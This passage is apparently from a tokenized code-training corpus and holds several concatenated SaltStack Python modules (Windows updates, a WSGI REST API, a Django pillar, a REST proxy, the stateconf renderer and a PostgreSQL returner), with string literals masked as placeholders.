debug ( '<STR_LIT>' . format ( str ( categories ) ) ) <EOL> updates = PyWinUpdater ( ) <EOL> if categories : <EOL> updates . SetCategories ( categories ) <EOL> updates . SetSkips ( skips ) <EOL> comment , passed , retries = _search ( updates , retries ) <EOL> if not passed : <EOL> return ( comment , str ( passed ) ) <EOL> log . debug ( '<STR_LIT>' . format ( str ( verbose ) ) ) <EOL> if verbose : <EOL> return updates . GetSearchResultsVerbose ( ) <EOL> return updates . GetSearchResults ( fields = fields ) <EOL> def download_updates ( skips = None , retries = <NUM_LIT:5> , categories = None ) : <EOL> '''<STR_LIT>''' <EOL> log . debug ( '<STR_LIT>' . format ( str ( categories ) ) ) <EOL> quidditch = PyWinUpdater ( skipDownloaded = True ) <EOL> quidditch . SetCategories ( categories ) <EOL> quidditch . SetSkips ( skips ) <EOL> comment , passed , retries = _search ( quidditch , retries ) <EOL> if not passed : <EOL> return ( comment , str ( passed ) ) <EOL> comment , passed , retries = _download ( quidditch , retries ) <EOL> if not passed : <EOL> return ( comment , str ( passed ) ) <EOL> try : <EOL> comment = quidditch . GetDownloadResults ( ) <EOL> except Exception as exc : <EOL> comment = u'<STR_LIT>' . format ( exc ) <EOL> return u'<STR_LIT>' . format ( comment ) <EOL> def install_updates ( skips = None , retries = <NUM_LIT:5> , categories = None ) : <EOL> '''<STR_LIT>''' <EOL> log . debug ( '<STR_LIT>' . format ( str ( categories ) ) ) <EOL> quidditch = PyWinUpdater ( ) <EOL> quidditch . SetCategories ( categories ) <EOL> quidditch . 
SetSkips ( skips ) <EOL> comment , passed , retries = _search ( quidditch , retries ) <EOL> if not passed : <EOL> return ( comment , str ( passed ) ) <EOL> comment , passed , retries = _download ( quidditch , retries ) <EOL> if not passed : <EOL> return ( comment , str ( passed ) ) <EOL> comment , passed , retries = _install ( quidditch , retries ) <EOL> if not passed : <EOL> return ( comment , str ( passed ) ) <EOL> try : <EOL> comment = quidditch . GetInstallationResultsPretty ( ) <EOL> except Exception as exc : <EOL> comment = '<STR_LIT>' . format ( exc ) <EOL> return '<STR_LIT>' . format ( comment ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import errno <EOL> import json <EOL> import logging <EOL> import os <EOL> import salt <EOL> import salt . netapi <EOL> H = { <EOL> <NUM_LIT:200> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> } <EOL> __virtualname__ = '<STR_LIT>' <EOL> logger = logging . getLogger ( __virtualname__ ) <EOL> def __virtual__ ( ) : <EOL> mod_opts = __opts__ . get ( __virtualname__ , { } ) <EOL> if '<STR_LIT:port>' in mod_opts : <EOL> return __virtualname__ <EOL> return False <EOL> class HTTPError ( Exception ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , code , message ) : <EOL> self . code = code <EOL> Exception . __init__ ( self , '<STR_LIT>' . format ( code , message ) ) <EOL> def mkdir_p ( path ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> os . makedirs ( path ) <EOL> except OSError as exc : <EOL> if exc . errno == errno . EEXIST and os . path . isdir ( path ) : <EOL> pass <EOL> else : <EOL> raise <EOL> def read_body ( environ ) : <EOL> '''<STR_LIT>''' <EOL> length = environ . get ( '<STR_LIT>' , '<STR_LIT:0>' ) <EOL> length = <NUM_LIT:0> if length == '<STR_LIT>' else int ( length ) <EOL> return environ [ '<STR_LIT>' ] . read ( length ) <EOL> def get_json ( environ ) : <EOL> '''<STR_LIT>''' <EOL> content_type = environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if content_type != '<STR_LIT:application/json>' : <EOL> raise HTTPError ( <NUM_LIT> , '<STR_LIT>' ) <EOL> try : <EOL> return json . loads ( read_body ( environ ) ) <EOL> except ValueError as exc : <EOL> raise HTTPError ( <NUM_LIT> , exc ) <EOL> def get_headers ( data , extra_headers = None ) : <EOL> '''<STR_LIT>''' <EOL> response_headers = { <EOL> '<STR_LIT>' : str ( len ( data ) ) , <EOL> } <EOL> if extra_headers : <EOL> response_headers . 
update ( extra_headers ) <EOL> return list ( response_headers . items ( ) ) <EOL> def run_chunk ( environ , lowstate ) : <EOL> '''<STR_LIT>''' <EOL> client = environ [ '<STR_LIT>' ] <EOL> for chunk in lowstate : <EOL> yield client . run ( chunk ) <EOL> def dispatch ( environ ) : <EOL> '''<STR_LIT>''' <EOL> method = environ [ '<STR_LIT>' ] . upper ( ) <EOL> if method == '<STR_LIT:GET>' : <EOL> return ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> elif method == '<STR_LIT:POST>' : <EOL> data = get_json ( environ ) <EOL> return run_chunk ( environ , data ) <EOL> else : <EOL> raise HTTPError ( <NUM_LIT> , '<STR_LIT>' ) <EOL> def saltenviron ( environ ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' not in locals ( ) : <EOL> import salt . config <EOL> __opts__ = salt . config . client_config ( <EOL> os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> environ [ '<STR_LIT>' ] = __opts__ <EOL> environ [ '<STR_LIT>' ] = salt . netapi . NetapiClient ( __opts__ ) <EOL> def application ( environ , start_response ) : <EOL> '''<STR_LIT>''' <EOL> saltenviron ( environ ) <EOL> try : <EOL> resp = list ( dispatch ( environ ) ) <EOL> code = <NUM_LIT:200> <EOL> except HTTPError as exc : <EOL> code = exc . code <EOL> resp = str ( exc ) <EOL> except salt . exceptions . EauthAuthenticationError as exc : <EOL> code = <NUM_LIT> <EOL> resp = str ( exc ) <EOL> except Exception as exc : <EOL> code = <NUM_LIT> <EOL> resp = str ( exc ) <EOL> try : <EOL> ret = json . dumps ( { '<STR_LIT>' : resp } ) <EOL> except TypeError as exc : <EOL> code = <NUM_LIT> <EOL> ret = str ( exc ) <EOL> start_response ( H [ code ] , get_headers ( ret , { <EOL> '<STR_LIT:Content-Type>' : '<STR_LIT:application/json>' , <EOL> } ) ) <EOL> return ( ret , ) <EOL> def get_opts ( ) : <EOL> '''<STR_LIT>''' <EOL> import salt . config <EOL> return salt . config . client_config ( <EOL> os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def start ( ) : <EOL> '''<STR_LIT>''' <EOL> from wsgiref . 
simple_server import make_server <EOL> if '<STR_LIT>' not in globals ( ) : <EOL> globals ( ) [ '<STR_LIT>' ] = get_opts ( ) <EOL> if __virtual__ ( ) is False : <EOL> raise SystemExit ( <NUM_LIT:1> ) <EOL> mod_opts = __opts__ . get ( __virtualname__ , { } ) <EOL> httpd = make_server ( '<STR_LIT:localhost>' , mod_opts [ '<STR_LIT:port>' ] , application ) <EOL> try : <EOL> httpd . serve_forever ( ) <EOL> except KeyboardInterrupt : <EOL> raise SystemExit ( <NUM_LIT:0> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> start ( ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import logging <EOL> import os <EOL> import sys <EOL> import salt . exceptions <EOL> import salt . ext . six as six <EOL> import salt . utils <EOL> HAS_VIRTUALENV = False <EOL> try : <EOL> import virtualenv <EOL> HAS_VIRTUALENV = True <EOL> except ImportError : <EOL> pass <EOL> log = logging . getLogger ( __name__ ) <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> return True <EOL> def ext_pillar ( minion_id , <EOL> pillar , <EOL> pillar_name , <EOL> project_path , <EOL> settings_module , <EOL> django_app , <EOL> env = None , <EOL> env_file = None , <EOL> * args , <EOL> ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> if not os . path . isdir ( project_path ) : <EOL> log . error ( '<STR_LIT>' . format ( <EOL> project_path ) ) <EOL> return { } <EOL> if HAS_VIRTUALENV and env is not None and os . path . isdir ( env ) : <EOL> for path in virtualenv . path_locations ( env ) : <EOL> if not os . path . isdir ( path ) : <EOL> log . error ( '<STR_LIT>' . format ( path ) ) <EOL> return { } <EOL> sys . path . insert ( <NUM_LIT:0> , <EOL> os . path . join ( <EOL> virtualenv . path_locations ( env ) [ <NUM_LIT:1> ] , <EOL> '<STR_LIT>' ) ) <EOL> sys . path . append ( project_path ) <EOL> os . environ [ '<STR_LIT>' ] = settings_module <EOL> if env_file is not None : <EOL> import subprocess <EOL> base_env = { } <EOL> proc = subprocess . Popen ( [ '<STR_LIT>' , '<STR_LIT:-c>' , '<STR_LIT>' ] , stdout = subprocess . PIPE ) <EOL> for line in proc . stdout : <EOL> ( key , _ , value ) = salt . utils . to_str ( line ) . partition ( '<STR_LIT:=>' ) <EOL> base_env [ key ] = value <EOL> command = [ '<STR_LIT>' , '<STR_LIT:-c>' , '<STR_LIT>' . format ( env_file ) ] <EOL> proc = subprocess . Popen ( command , stdout = subprocess . PIPE ) <EOL> for line in proc . stdout : <EOL> ( key , _ , value ) = salt . utils . to_str ( line ) . 
partition ( '<STR_LIT:=>' ) <EOL> if key not in base_env or base_env [ key ] != value : <EOL> os . environ [ key ] = value . rstrip ( '<STR_LIT:\n>' ) <EOL> log . debug ( '<STR_LIT>' . format ( <EOL> key , <EOL> value . rstrip ( '<STR_LIT:\n>' ) ) ) <EOL> try : <EOL> from django . db . models . loading import get_model <EOL> django_pillar = { } <EOL> for proj_app , models in six . iteritems ( django_app ) : <EOL> _ , _ , app = proj_app . rpartition ( '<STR_LIT:.>' ) <EOL> django_pillar [ app ] = { } <EOL> for model_name , model_meta in six . iteritems ( models ) : <EOL> model_orm = get_model ( app , model_name ) <EOL> if model_orm is None : <EOL> raise salt . exceptions . SaltException ( <EOL> "<STR_LIT>" <EOL> . format ( app , model_name ) ) <EOL> pillar_for_model = django_pillar [ app ] [ model_orm . __name__ ] = { } <EOL> name_field = model_meta [ '<STR_LIT:name>' ] <EOL> fields = model_meta [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in model_meta : <EOL> qs = ( model_orm . objects <EOL> . filter ( ** model_meta [ '<STR_LIT>' ] ) <EOL> . values ( * fields ) ) <EOL> else : <EOL> qs = model_orm . objects . values ( * fields ) <EOL> for model in qs : <EOL> if name_field not in model : <EOL> raise salt . exceptions . SaltException ( <EOL> "<STR_LIT>" . format ( <EOL> name_field ) ) <EOL> if model [ name_field ] in pillar_for_model : <EOL> raise salt . exceptions . SaltException ( <EOL> "<STR_LIT>" . format ( <EOL> model [ name_field ] ) ) <EOL> pillar_for_model [ model [ name_field ] ] = model <EOL> return { pillar_name : django_pillar } <EOL> except ImportError as e : <EOL> log . error ( '<STR_LIT>' . format ( str ( e ) ) ) <EOL> return { } <EOL> except Exception as e : <EOL> log . error ( '<STR_LIT>' . format ( str ( e ) ) ) <EOL> log . debug ( '<STR_LIT>' , exc_info = True ) <EOL> return { } </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import logging <EOL> import salt . utils . http <EOL> __proxyenabled__ = [ '<STR_LIT>' ] <EOL> CONFIG = { } <EOL> CONFIG_BASE_URL = '<STR_LIT>' <EOL> log = logging . getLogger ( __file__ ) <EOL> def __virtual__ ( ) : <EOL> return True <EOL> def init ( opts ) : <EOL> '''<STR_LIT>''' <EOL> if CONFIG_BASE_URL in opts [ '<STR_LIT>' ] : <EOL> CONFIG [ CONFIG_BASE_URL ] = opts [ '<STR_LIT>' ] [ CONFIG_BASE_URL ] <EOL> else : <EOL> log . error ( '<STR_LIT>' , CONFIG_BASE_URL ) <EOL> log . debug ( '<STR_LIT>' , CONFIG ) <EOL> def ping ( ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> response = salt . utils . http . query ( <EOL> "<STR_LIT>" . format ( CONFIG [ CONFIG_BASE_URL ] ) , <EOL> decode_type = '<STR_LIT>' , <EOL> decode = True , <EOL> ) <EOL> log . debug ( <EOL> '<STR_LIT>' , <EOL> response , <EOL> ) <EOL> if '<STR_LIT>' in response : <EOL> return True <EOL> except Exception as ex : <EOL> log . error ( <EOL> '<STR_LIT>' , <EOL> CONFIG [ CONFIG_BASE_URL ] , <EOL> ex , <EOL> ) <EOL> return False <EOL> def shutdown ( opts ) : <EOL> '''<STR_LIT>''' <EOL> log . debug ( '<STR_LIT>' ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import logging <EOL> import re <EOL> import getopt <EOL> import copy <EOL> from os import path as ospath <EOL> import salt . utils <EOL> from salt . exceptions import SaltRenderError <EOL> import salt . ext . six as six <EOL> from salt . ext . six . moves import StringIO <EOL> __all__ = [ '<STR_LIT>' ] <EOL> log = logging . getLogger ( __name__ ) <EOL> __opts__ = { <EOL> '<STR_LIT>' : r'<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> STATE_FUNC = STATE_NAME = '<STR_LIT>' <EOL> def __init__ ( opts ) : <EOL> global STATE_NAME , STATE_FUNC <EOL> STATE_FUNC = __opts__ [ '<STR_LIT>' ] <EOL> STATE_NAME = STATE_FUNC . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] <EOL> MOD_BASENAME = ospath . basename ( __file__ ) <EOL> INVALID_USAGE_ERROR = SaltRenderError ( <EOL> '<STR_LIT>' <EOL> '''<STR_LIT>''' . format ( MOD_BASENAME , MOD_BASENAME ) <EOL> ) <EOL> def render ( input , saltenv = '<STR_LIT>' , sls = '<STR_LIT>' , argline = '<STR_LIT>' , ** kws ) : <EOL> gen_start_state = False <EOL> no_goal_state = False <EOL> implicit_require = False <EOL> def process_sls_data ( data , context = None , extract = False ) : <EOL> sls_dir = ospath . dirname ( sls . replace ( '<STR_LIT:.>' , ospath . sep ) ) if '<STR_LIT:.>' in sls else sls <EOL> ctx = dict ( sls_dir = sls_dir if sls_dir else '<STR_LIT:.>' ) <EOL> if context : <EOL> ctx . update ( context ) <EOL> tmplout = render_template ( <EOL> StringIO ( data ) , saltenv , sls , context = ctx , <EOL> argline = rt_argline . strip ( ) , ** kws <EOL> ) <EOL> high = render_data ( tmplout , saltenv , sls , argline = rd_argline . strip ( ) ) <EOL> return process_high_data ( high , extract ) <EOL> def process_high_data ( high , extract ) : <EOL> data = copy . 
deepcopy ( high ) <EOL> try : <EOL> rewrite_single_shorthand_state_decl ( data ) <EOL> rewrite_sls_includes_excludes ( data , sls , saltenv ) <EOL> if not extract and implicit_require : <EOL> sid = has_names_decls ( data ) <EOL> if sid : <EOL> raise SaltRenderError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( sid ) <EOL> ) <EOL> add_implicit_requires ( data ) <EOL> if gen_start_state : <EOL> add_start_state ( data , sls ) <EOL> if not extract and not no_goal_state : <EOL> add_goal_state ( data ) <EOL> rename_state_ids ( data , sls ) <EOL> extract_state_confs ( data ) <EOL> except SaltRenderError : <EOL> raise <EOL> except Exception as err : <EOL> log . exception ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( sls , err ) <EOL> ) <EOL> from salt . state import State <EOL> state = State ( __opts__ ) <EOL> errors = state . verify_high ( high ) <EOL> if errors : <EOL> raise SaltRenderError ( '<STR_LIT:\n>' . join ( errors ) ) <EOL> raise SaltRenderError ( '<STR_LIT>' ) <EOL> return data <EOL> renderers = kws [ '<STR_LIT>' ] <EOL> opts , args = getopt . getopt ( argline . split ( ) , '<STR_LIT>' ) <EOL> argline = '<STR_LIT:U+0020>' . join ( args ) if args else '<STR_LIT>' <EOL> if ( '<STR_LIT>' , '<STR_LIT>' ) in opts : <EOL> no_goal_state = True <EOL> if ( '<STR_LIT>' , '<STR_LIT>' ) in opts : <EOL> implicit_require = True <EOL> if ( '<STR_LIT>' , '<STR_LIT>' ) in opts : <EOL> gen_start_state = True <EOL> if ( '<STR_LIT>' , '<STR_LIT>' ) in opts : <EOL> data = process_high_data ( input , extract = False ) <EOL> else : <EOL> args = [ <EOL> arg . strip ( ) . replace ( '<STR_LIT>' , '<STR_LIT:.>' ) <EOL> for arg in re . split ( r'<STR_LIT>' , argline , <NUM_LIT:1> ) <EOL> ] <EOL> try : <EOL> name , rd_argline = ( args [ <NUM_LIT:0> ] + '<STR_LIT:U+0020>' ) . 
split ( '<STR_LIT:U+0020>' , <NUM_LIT:1> ) <EOL> render_data = renderers [ name ] <EOL> if implicit_require : <EOL> if name == '<STR_LIT>' : <EOL> rd_argline = '<STR_LIT>' + rd_argline <EOL> else : <EOL> raise SaltRenderError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> name , rt_argline = ( args [ <NUM_LIT:1> ] + '<STR_LIT:U+0020>' ) . split ( '<STR_LIT:U+0020>' , <NUM_LIT:1> ) <EOL> render_template = renderers [ name ] <EOL> except KeyError as err : <EOL> raise SaltRenderError ( '<STR_LIT>' . format ( err ) ) <EOL> except IndexError : <EOL> raise INVALID_USAGE_ERROR <EOL> if isinstance ( input , six . string_types ) : <EOL> with salt . utils . fopen ( input , '<STR_LIT:r>' ) as ifile : <EOL> sls_templ = ifile . read ( ) <EOL> else : <EOL> sls_templ = input . read ( ) <EOL> match = re . search ( __opts__ [ '<STR_LIT>' ] , sls_templ ) <EOL> if match : <EOL> process_sls_data ( sls_templ [ : match . start ( ) ] , extract = True ) <EOL> if STATE_CONF : <EOL> tmplctx = STATE_CONF . copy ( ) <EOL> if tmplctx : <EOL> prefix = sls + '<STR_LIT>' <EOL> for k in six . iterkeys ( tmplctx ) : <EOL> if k . startswith ( prefix ) : <EOL> tmplctx [ k [ len ( prefix ) : ] ] = tmplctx [ k ] <EOL> del tmplctx [ k ] <EOL> else : <EOL> tmplctx = { } <EOL> data = process_sls_data ( sls_templ , tmplctx ) <EOL> if log . isEnabledFor ( logging . DEBUG ) : <EOL> import pprint <EOL> log . debug ( '<STR_LIT>' . format ( pprint . pformat ( data ) ) ) <EOL> return data <EOL> def has_names_decls ( data ) : <EOL> for sid , _ , _ , args in statelist ( data ) : <EOL> if sid == '<STR_LIT>' : <EOL> continue <EOL> for _ in nvlist ( args , [ '<STR_LIT>' ] ) : <EOL> return sid <EOL> def rewrite_single_shorthand_state_decl ( data ) : <EOL> '''<STR_LIT>''' <EOL> for sid , states in six . iteritems ( data ) : <EOL> if isinstance ( states , six . 
string_types ) : <EOL> data [ sid ] = { states : [ ] } <EOL> def rewrite_sls_includes_excludes ( data , sls , saltenv ) : <EOL> for sid in data : <EOL> if sid == '<STR_LIT>' : <EOL> includes = data [ sid ] <EOL> for i , each in enumerate ( includes ) : <EOL> if isinstance ( each , dict ) : <EOL> slsenv , incl = each . popitem ( ) <EOL> else : <EOL> slsenv = saltenv <EOL> incl = each <EOL> if incl . startswith ( '<STR_LIT:.>' ) : <EOL> includes [ i ] = { slsenv : _relative_to_abs_sls ( incl , sls ) } <EOL> elif sid == '<STR_LIT>' : <EOL> for sdata in data [ sid ] : <EOL> if '<STR_LIT>' in sdata and sdata [ '<STR_LIT>' ] . startswith ( '<STR_LIT:.>' ) : <EOL> sdata [ '<STR_LIT>' ] = _relative_to_abs_sls ( sdata [ '<STR_LIT>' ] , sls ) <EOL> def _local_to_abs_sid ( sid , sls ) : <EOL> if '<STR_LIT>' in sid : <EOL> return _relative_to_abs_sls ( sid , sls ) <EOL> else : <EOL> abs_sls = _relative_to_abs_sls ( sid , sls + '<STR_LIT:.>' ) <EOL> return '<STR_LIT>' . join ( abs_sls . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) ) <EOL> def _relative_to_abs_sls ( relative , sls ) : <EOL> '''<STR_LIT>''' <EOL> levels , suffix = re . match ( r'<STR_LIT>' , relative ) . groups ( ) <EOL> level_count = len ( levels ) <EOL> p_comps = sls . split ( '<STR_LIT:.>' ) <EOL> if level_count > len ( p_comps ) : <EOL> raise SaltRenderError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> return '<STR_LIT:.>' . join ( p_comps [ : - level_count ] + [ suffix ] ) <EOL> def nvlist ( thelist , names = None ) : <EOL> '''<STR_LIT>''' <EOL> for nvitem in thelist : <EOL> if isinstance ( nvitem , dict ) : <EOL> name , value = next ( six . 
iteritems ( nvitem ) ) <EOL> if names is None or name in names : <EOL> yield nvitem , name , value <EOL> def nvlist2 ( thelist , names = None ) : <EOL> '''<STR_LIT>''' <EOL> for _ , _ , value in nvlist ( thelist , names ) : <EOL> for each in nvlist ( value ) : <EOL> yield each <EOL> def statelist ( states_dict , sid_excludes = frozenset ( [ '<STR_LIT>' , '<STR_LIT>' ] ) ) : <EOL> for sid , states in six . iteritems ( states_dict ) : <EOL> if sid . startswith ( '<STR_LIT>' ) : <EOL> continue <EOL> if sid in sid_excludes : <EOL> continue <EOL> for sname , args in six . iteritems ( states ) : <EOL> if sname . startswith ( '<STR_LIT>' ) : <EOL> continue <EOL> yield sid , states , sname , args <EOL> REQUISITES = set ( [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ] ) <EOL> def rename_state_ids ( data , sls , is_extend = False ) : <EOL> if '<STR_LIT>' in data and not is_extend : <EOL> rename_state_ids ( data [ '<STR_LIT>' ] , sls , True ) <EOL> for sid , _ , _ , args in statelist ( data ) : <EOL> for req , sname , sid in nvlist2 ( args , REQUISITES ) : <EOL> if sid . startswith ( '<STR_LIT:.>' ) : <EOL> req [ sname ] = _local_to_abs_sid ( sid , sls ) <EOL> for sid in data : <EOL> if sid . startswith ( '<STR_LIT:.>' ) : <EOL> newsid = _local_to_abs_sid ( sid , sls ) <EOL> if newsid in data : <EOL> raise SaltRenderError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( sid , newsid ) <EOL> ) <EOL> for sname , args in six . iteritems ( data [ sid ] ) : <EOL> if state_name ( sname ) == STATE_NAME : <EOL> continue <EOL> for arg in args : <EOL> if isinstance ( arg , dict ) and next ( iter ( arg ) ) == '<STR_LIT:name>' : <EOL> break <EOL> else : <EOL> args . 
insert ( <NUM_LIT:0> , dict ( name = sid [ <NUM_LIT:1> : ] ) ) <EOL> data [ newsid ] = data [ sid ] <EOL> del data [ sid ] <EOL> REQUIRE = set ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> REQUIRE_IN = set ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> EXTENDED_REQUIRE = { } <EOL> EXTENDED_REQUIRE_IN = { } <EOL> from itertools import chain <EOL> def add_implicit_requires ( data ) : <EOL> def T ( sid , state ) : <EOL> return '<STR_LIT>' . format ( sid , state_name ( state ) ) <EOL> states_before = set ( ) <EOL> states_after = set ( ) <EOL> for sid in data : <EOL> for state in data [ sid ] : <EOL> states_after . add ( T ( sid , state ) ) <EOL> prev_state = ( None , None ) <EOL> for sid , states , sname , args in statelist ( data ) : <EOL> if sid == '<STR_LIT>' : <EOL> for esid , _ , _ , eargs in statelist ( states ) : <EOL> for _ , rstate , rsid in nvlist2 ( eargs , REQUIRE ) : <EOL> EXTENDED_REQUIRE . setdefault ( <EOL> T ( esid , rstate ) , [ ] ) . append ( ( None , rstate , rsid ) ) <EOL> for _ , rstate , rsid in nvlist2 ( eargs , REQUIRE_IN ) : <EOL> EXTENDED_REQUIRE_IN . setdefault ( <EOL> T ( esid , rstate ) , [ ] ) . append ( ( None , rstate , rsid ) ) <EOL> continue <EOL> tag = T ( sid , sname ) <EOL> states_after . remove ( tag ) <EOL> reqs = nvlist2 ( args , REQUIRE ) <EOL> if tag in EXTENDED_REQUIRE : <EOL> reqs = chain ( reqs , EXTENDED_REQUIRE [ tag ] ) <EOL> for _ , rstate , rsid in reqs : <EOL> if T ( rsid , rstate ) in states_after : <EOL> raise SaltRenderError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( tag , T ( rsid , rstate ) ) <EOL> ) <EOL> reqs = nvlist2 ( args , REQUIRE_IN ) <EOL> if tag in EXTENDED_REQUIRE_IN : <EOL> reqs = chain ( reqs , EXTENDED_REQUIRE_IN [ tag ] ) <EOL> for _ , rstate , rsid in reqs : <EOL> if T ( rsid , rstate ) in states_before : <EOL> raise SaltRenderError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . 
format ( tag , T ( rsid , rstate ) ) <EOL> ) <EOL> if prev_state [ <NUM_LIT:0> ] is not None : <EOL> try : <EOL> next ( nvlist ( args , [ '<STR_LIT>' ] ) ) [ <NUM_LIT:2> ] . insert ( <NUM_LIT:0> , dict ( [ prev_state ] ) ) <EOL> except StopIteration : <EOL> args . append ( dict ( require = [ dict ( [ prev_state ] ) ] ) ) <EOL> states_before . add ( tag ) <EOL> prev_state = ( state_name ( sname ) , sid ) <EOL> def add_start_state ( data , sls ) : <EOL> start_sid = __opts__ [ '<STR_LIT>' ] <EOL> if start_sid in data : <EOL> raise SaltRenderError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( start_sid ) <EOL> ) <EOL> if not data : <EOL> return <EOL> non_sids = set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> for sid , states in six . iteritems ( data ) : <EOL> if sid in non_sids or sid . startswith ( '<STR_LIT>' ) : <EOL> continue <EOL> if '<STR_LIT>' not in states or states [ '<STR_LIT>' ] == sls : <EOL> break <EOL> else : <EOL> raise SaltRenderError ( '<STR_LIT>' ) <EOL> reqin = { state_name ( next ( six . iterkeys ( data [ sid ] ) ) ) : sid } <EOL> data [ start_sid ] = { STATE_FUNC : [ { '<STR_LIT>' : [ reqin ] } ] } <EOL> def add_goal_state ( data ) : <EOL> goal_sid = __opts__ [ '<STR_LIT>' ] <EOL> if goal_sid in data : <EOL> raise SaltRenderError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( goal_sid ) <EOL> ) <EOL> else : <EOL> reqlist = [ ] <EOL> for sid , states , state , _ in statelist ( data , set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) ) : <EOL> if '<STR_LIT>' in states : <EOL> continue <EOL> reqlist . append ( { state_name ( state ) : sid } ) <EOL> data [ goal_sid ] = { STATE_FUNC : [ dict ( require = reqlist ) ] } <EOL> def state_name ( sname ) : <EOL> '''<STR_LIT>''' <EOL> return sname . 
split ( '<STR_LIT:.>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> class Bunch ( dict ) : <EOL> def __getattr__ ( self , name ) : <EOL> return self [ name ] <EOL> STATE_CONF = { } <EOL> STATE_CONF_EXT = { } <EOL> def extract_state_confs ( data , is_extend = False ) : <EOL> for state_id , state_dict in six . iteritems ( data ) : <EOL> if state_id == '<STR_LIT>' and not is_extend : <EOL> extract_state_confs ( state_dict , True ) <EOL> continue <EOL> if STATE_NAME in state_dict : <EOL> key = STATE_NAME <EOL> elif STATE_FUNC in state_dict : <EOL> key = STATE_FUNC <EOL> else : <EOL> continue <EOL> to_dict = STATE_CONF_EXT if is_extend else STATE_CONF <EOL> conf = to_dict . setdefault ( state_id , Bunch ( ) ) <EOL> for sdk in state_dict [ key ] : <EOL> if not isinstance ( sdk , dict ) : <EOL> continue <EOL> key , val = next ( six . iteritems ( sdk ) ) <EOL> conf [ key ] = val <EOL> if not is_extend and state_id in STATE_CONF_EXT : <EOL> extend = STATE_CONF_EXT [ state_id ] <EOL> for requisite in '<STR_LIT>' , '<STR_LIT>' : <EOL> if requisite in extend : <EOL> extend [ requisite ] += to_dict [ state_id ] . get ( requisite , [ ] ) <EOL> to_dict [ state_id ] . update ( STATE_CONF_EXT [ state_id ] ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import json <EOL> import logging <EOL> import re <EOL> import sys <EOL> import salt . utils <EOL> import salt . utils . jid <EOL> import salt . ext . six as six <EOL> try : <EOL> import psycopg2 <EOL> HAS_POSTGRES = True <EOL> except ImportError : <EOL> HAS_POSTGRES = False <EOL> log = logging . getLogger ( __name__ ) <EOL> LOAD_P = '<STR_LIT>' <EOL> MINIONS_P = '<STR_LIT>' <EOL> RETURN_P = '<STR_LIT>' <EOL> OUT_P = '<STR_LIT>' <EOL> def __virtual__ ( ) : <EOL> if not HAS_POSTGRES : <EOL> log . info ( "<STR_LIT>" ) <EOL> return False <EOL> return '<STR_LIT>' <EOL> def _get_conn ( ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> conn = psycopg2 . connect ( <EOL> host = __opts__ [ '<STR_LIT>' ] , <EOL> user = __opts__ [ '<STR_LIT>' ] , <EOL> password = __opts__ [ '<STR_LIT>' ] , <EOL> database = __opts__ [ '<STR_LIT>' ] , <EOL> port = __opts__ [ '<STR_LIT>' ] ) <EOL> except psycopg2 . OperationalError : <EOL> log . error ( "<STR_LIT>" + str ( sys . exc_info ( ) [ <NUM_LIT:0> ] ) ) <EOL> return None <EOL> return conn <EOL> def _close_conn ( conn ) : <EOL> '''<STR_LIT>''' <EOL> conn . commit ( ) <EOL> conn . close ( ) <EOL> def _format_job_instance ( job ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT>' : job . get ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : json . loads ( job . get ( '<STR_LIT>' , '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : job . get ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : job . get ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : job . get ( '<STR_LIT:user>' , '<STR_LIT:root>' ) } <EOL> return ret <EOL> def _format_jid_instance ( jid , job ) : <EOL> 